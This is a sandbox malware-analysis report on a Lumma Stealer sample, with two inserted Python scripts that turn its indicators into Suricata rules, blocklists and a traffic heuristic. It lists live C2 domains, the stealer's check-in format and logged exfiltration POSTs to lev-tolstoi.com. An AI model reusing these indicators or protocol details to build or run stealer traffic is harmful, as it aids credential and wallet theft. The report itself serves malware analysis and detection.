Windows Analysis Report
0gnHF2twcT.exe

Overview

General Information

Sample name: 0gnHF2twcT.exe
renamed because original name is a hash value
Original sample name: 85bfde4071d80bb2bdffb80f68d54d17.exe
Analysis ID: 1579668
MD5: 85bfde4071d80bb2bdffb80f68d54d17
SHA1: d5f0c8caf84adc02892f6a3c2cbeeacca1379be5
SHA256: 945cc86dc25c7ac098e62ada6086c71aba93c5c9522076a0ed7923833cf5becb
Tags: exe, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection

Source: 0gnHF2twcT.exe Avira: detected
Source: 0gnHF2twcT.exe.1464.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", "necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", "rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], "Build id": "PsFKDg--pablo"}
Source: 0gnHF2twcT.exe ReversingLabs: Detection: 57%
Source: 0gnHF2twcT.exe Virustotal: Detection: 54%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0gnHF2twcT.exe Joe Sandbox ML: detected
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: rapeflowwj.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: crosshuaht.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: sustainskelet.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: aspecteirs.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: energyaffai.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: necklacebudi.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: discokeyus.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: grannyejh.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: sweepyribs.lat
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000003.1456424591.0000000004850000.00000004.00001000.00020000.00000000.sdmp String decryptor: PsFKDg--pablo
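The extracted configuration above (nine .lat C2 domains and a build id) is the most reusable part of this report. As an added example, not part of the Joe Sandbox report or of any vendor tooling, the Python below parses that extractor line verbatim, emits Suricata DNS-query and TLS-SNI rules for each configured domain plus a low-confidence JA3 rule, and writes a hosts-file sinkhole list. The SID range (1000001 upwards) is an assumption following the usual local-rule convention; the Suricata keywords used (dns.query, tls.sni, ja3.hash, endswith) require Suricata 5 or later.

```python
import json
import re

# Constructed inline: the "Malware Configuration Extractor" line of this report, verbatim.
CONFIG_LINE = (
    'Malware Configuration Extractor: LummaC {"C2 url": ["energyaffai.lat", '
    '"necklacebudi.lat", "aspecteirs.lat", "discokeyus.lat", "crosshuaht.lat", '
    '"rapeflowwj.lat", "sustainskelet.lat", "grannyejh.lat", "sweepyribs.lat"], '
    '"Build id": "PsFKDg--pablo"}'
)
# Other network indicators the report lists (Joe Sandbox View IP / JA3 lines).
PEER_IPS = ["104.21.66.86", "23.55.153.106"]
JA3_HASH = "a0e9f5d64349fb13191bc781f81f42e1"
# Assumption: local rules live in the conventional 1,000,000+ SID range.
LOCAL_SID_BASE = 1000001


def parse_config(line: str) -> dict:
    """Extract family, C2 domains and build id from an 'Extractor: <family> {json}' line."""
    m = re.search(r"Extractor:\s*(\S+)\s*(\{.*\})", line)
    if not m:
        raise ValueError("no extractor JSON in line")
    family, blob = m.group(1), json.loads(m.group(2))
    # De-duplicate while keeping the order the extractor reported.
    domains = list(dict.fromkeys(d.strip().lower() for d in blob.get("C2 url", [])))
    return {"family": family, "c2": domains, "build_id": blob.get("Build id", "")}


def _rule(proto: str, msg: str, body: str, sid: int) -> str:
    return (f'alert {proto} $HOME_NET any -> any any (msg:"{msg}"; {body} '
            f'classtype:trojan-activity; sid:{sid}; rev:1;)')


def suricata_rules(cfg: dict, ja3: str = JA3_HASH, sid_base: int = LOCAL_SID_BASE) -> list[str]:
    """One dns.query rule and one tls.sni rule per C2 domain, then a single JA3 rule.
    'endswith' anchors the match so 'evil-energyaffai.lat' still hits but 'energyaffai.lat.example' does not."""
    rules, sid = [], sid_base
    for dom in cfg["c2"]:
        rules.append(_rule("dns", f"LOCAL MALWARE {cfg['family']} C2 domain in DNS lookup ({dom})",
                           f'dns.query; content:"{dom}"; nocase; endswith;', sid))
        sid += 1
    for dom in cfg["c2"]:
        rules.append(_rule("tls", f"LOCAL MALWARE {cfg['family']} C2 domain in TLS SNI ({dom})",
                           f'tls.sni; content:"{dom}"; nocase; endswith;', sid))
        sid += 1
    # JA3 alone is weak evidence: the report itself rates the hit on this hash severity 3.
    rules.append(_rule("tls", f"LOCAL INFO JA3 hash seen with {cfg['family']} sample (low confidence)",
                       f'ja3.hash; content:"{ja3}";', sid))
    return rules


def hosts_blocklist(cfg: dict) -> str:
    """Sinkhole entries in hosts-file format; the build id is kept as a comment for tracking."""
    lines = [f"# {cfg['family']} build {cfg['build_id']}"]
    lines += [f"0.0.0.0 {dom}" for dom in cfg["c2"]]
    return "\n".join(lines) + "\n"


def indicators(cfg: dict, ips=PEER_IPS, ja3=JA3_HASH) -> list[dict]:
    """Flat indicator list with context, so consumers can weight each entry."""
    ind = [{"type": "domain", "value": d, "context": "configured C2"} for d in cfg["c2"]]
    ind += [{"type": "ipv4", "value": ip, "context": "TLS peer seen in sandbox run"} for ip in ips]
    ind.append({"type": "ja3", "value": ja3, "context": "TLS client fingerprint (low confidence)"})
    return ind


if __name__ == "__main__":
    cfg = parse_config(CONFIG_LINE)
    print("\n".join(suricata_rules(cfg)))
    print(hosts_blocklist(cfg))
```

Two caveats a practitioner should keep in mind: the HTTP POSTs in this run went to lev-tolstoi.com, which is not among the nine configured domains, so the config-derived rules do not cover the live C2 by themselves; and neither peer IP should be blocked outright, since 23.55.153.106 served steamcommunity.com in this run and 104.21.66.86 is a shared CDN address.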
Source: 0gnHF2twcT.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: C:\Users\user\Desktop\0gnHF2twcT.exe Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\3D Objects
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\0gnHF2twcT.exe File opened: C:\Users\user\AppData\Local\Google

Networking

Source: Network traffic Suricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.8:59276 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.8:56152 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058358 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat) : 192.168.2.8:57627 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058376 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat) : 192.168.2.8:65050 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058370 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat) : 192.168.2.8:59570 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058362 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat) : 192.168.2.8:49500 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058374 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat) : 192.168.2.8:61858 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.8:62061 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2058354 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat) : 192.168.2.8:60010 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49704 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49713 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Malware configuration extractor URLs: energyaffai.lat
Source: Malware configuration extractor URLs: necklacebudi.lat
Source: Malware configuration extractor URLs: aspecteirs.lat
Source: Malware configuration extractor URLs: discokeyus.lat
Source: Malware configuration extractor URLs: crosshuaht.lat
Source: Malware configuration extractor URLs: rapeflowwj.lat
Source: Malware configuration extractor URLs: sustainskelet.lat
Source: Malware configuration extractor URLs: grannyejh.lat
Source: Malware configuration extractor URLs: sweepyribs.lat
Source: Joe Sandbox View IP Address: 104.21.66.86
Source: Joe Sandbox View IP Address: 23.55.153.106
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49705 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49704 -> 23.55.153.106:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 104.21.66.86:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 104.21.66.86:443
Source: global traffic HTTP traffic detected:
    GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 47
    Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=ZKXX8IDAOM1N3I
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12822
    Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=KR0VE528KXP
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15033
    Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=RW4EII7M5UG7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20206
    Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=90K0SFJK
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1170
    Host: lev-tolstoi.com
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=08RS2QQ5TDI6
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 588250
    Host: lev-tolstoi.com
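The request sequence above is the behavioural signal worth detecting: one GET to a Steam profile, two tiny form-urlencoded POSTs to /api, then five multipart POSTs to the same path that grow to 588 KB. Note that every request carried a stock Chrome 119 user agent even though "TeslaBrowser/5.5" is among the sample's decrypted strings, so matching on that UA alone would have missed this run. As an added example that is not part of the report, the Python below replays these requests (constructed from the report's own header values) through a check-in-then-upload heuristic and checks whether the two check-in body sizes are what a Lumma client with build id PsFKDg--pablo would send. The action names "act=life" and "act=recive_message" (sic) are taken from public Lumma write-ups, not from this report, which only shows the "lid=%s&j=%s&ver=4.0" format string; the report also does not state how lev-tolstoi.com was obtained, and the Steam-profile helper is labelled accordingly.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class HttpReq:
    method: str
    host: str
    path: str
    content_type: str
    content_length: int
    user_agent: str


# The UA every request in the report carried (stock Chrome 119, not "TeslaBrowser/5.5").
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
FORM = "application/x-www-form-urlencoded"

# Constructed from the "HTTP traffic detected" lines of this report, in report order.
REQUESTS = [
    HttpReq("GET", "steamcommunity.com", "/profiles/76561199724331900", "", 0, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", FORM, 8, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", FORM, 47, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", "multipart/form-data; boundary=ZKXX8IDAOM1N3I", 12822, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", "multipart/form-data; boundary=KR0VE528KXP", 15033, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", "multipart/form-data; boundary=RW4EII7M5UG7", 20206, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", "multipart/form-data; boundary=90K0SFJK", 1170, UA),
    HttpReq("POST", "lev-tolstoi.com", "/api", "multipart/form-data; boundary=08RS2QQ5TDI6", 588250, UA),
]

BUILD_ID = "PsFKDg--pablo"           # "Build id" from the extracted config
CHECKIN_FMT = "lid=%s&j=%s&ver=4.0"  # decrypted format string from the report


def expected_checkin_lengths(build_id: str) -> tuple[int, int]:
    """Body sizes of the first two POSTs if they are the 'life' and 'recive_message' (sic)
    check-ins. Those action names come from public Lumma write-ups, not from this report."""
    life = "act=life"
    receive = "act=recive_message&" + CHECKIN_FMT % (build_id, "")
    return len(life), len(receive)


def find_checkin_then_upload(reqs, max_checkin_len: int = 128) -> list[dict]:
    """Per (host, path): a small form-urlencoded POST later followed by multipart POST(s)
    to the same path. Returns one alert per target with upload byte totals."""
    by_target = defaultdict(list)
    for r in reqs:
        if r.method == "POST":
            by_target[(r.host, r.path)].append(r)
    alerts = []
    for (host, path), posts in by_target.items():
        def is_checkin(r):
            return r.content_type.startswith(FORM) and r.content_length <= max_checkin_len
        first = next((i for i, r in enumerate(posts) if is_checkin(r)), None)
        if first is None:
            continue
        uploads = [r for r in posts[first + 1:] if r.content_type.startswith("multipart/form-data")]
        if not uploads:
            continue
        checkins = [r for r in posts if is_checkin(r)]
        alerts.append({
            "host": host, "path": path,
            "checkins": len(checkins),
            "checkin_lengths": [r.content_length for r in checkins],
            "uploads": len(uploads),
            "bytes_out": sum(r.content_length for r in uploads),
            "largest_upload": max(r.content_length for r in uploads),
        })
    return alerts


def checkins_match_lumma(alert: dict, build_id: str = BUILD_ID) -> bool:
    """Cheap corroboration once the build id is known: do the observed check-in
    sizes equal the sizes this build id would produce?"""
    return tuple(alert["checkin_lengths"][:2]) == expected_checkin_lengths(build_id)


def steam_profile_lookups(reqs) -> list[str]:
    """SteamID64s fetched from steamcommunity.com before the first POST. Public Lumma
    write-ups describe the profile name as a dead-drop resolver for the live C2; this
    report does not say how lev-tolstoi.com was obtained, so treat this as context only."""
    ids = []
    for r in reqs:
        if r.method == "POST":
            break
        if r.host == "steamcommunity.com" and r.path.startswith("/profiles/"):
            ids.append(r.path.split("/")[2])
    return ids


if __name__ == "__main__":
    for a in find_checkin_then_upload(REQUESTS):
        print(a, "lumma-sized check-ins:", checkins_match_lumma(a))
    print("steam profiles fetched first:", steam_profile_lookups(REQUESTS))
```

The heuristic is host-agnostic on purpose: the configured .lat domains never received HTTP in this run, so a detection keyed on them would have fired only on DNS. Feed it from a proxy or Zeek http.log where TLS is inspected; on uninspected traffic the same shape is still visible as one small flow followed by several large outbound flows to the same IP:443.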
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 11 times)
Source: 0gnHF2twcT.exe, 00000000.00000003.1508244562.0000000000A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=16219b16eba2e1d25c63a86f; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:18:43 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000003.1508147134.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
Source: 0gnHF2twcT.exe, 00000000.00000002.1708331729.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1697983112.0000000000A35000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-srFc equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: sweepyribs.lat
Source: global traffic DNS traffic detected: DNS query: grannyejh.lat
Source: global traffic DNS traffic detected: DNS query: discokeyus.lat
Source: global traffic DNS traffic detected: DNS query: necklacebudi.lat
Source: global traffic DNS traffic detected: DNS query: energyaffai.lat
Source: global traffic DNS traffic detected: DNS query: aspecteirs.lat
Source: global traffic DNS traffic detected: DNS query: sustainskelet.lat
Source: global traffic DNS traffic detected: DNS query: crosshuaht.lat
Source: global traffic DNS traffic detected: DNS query: rapeflowwj.lat
Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic DNS traffic detected: DNS query: lev-tolstoi.com
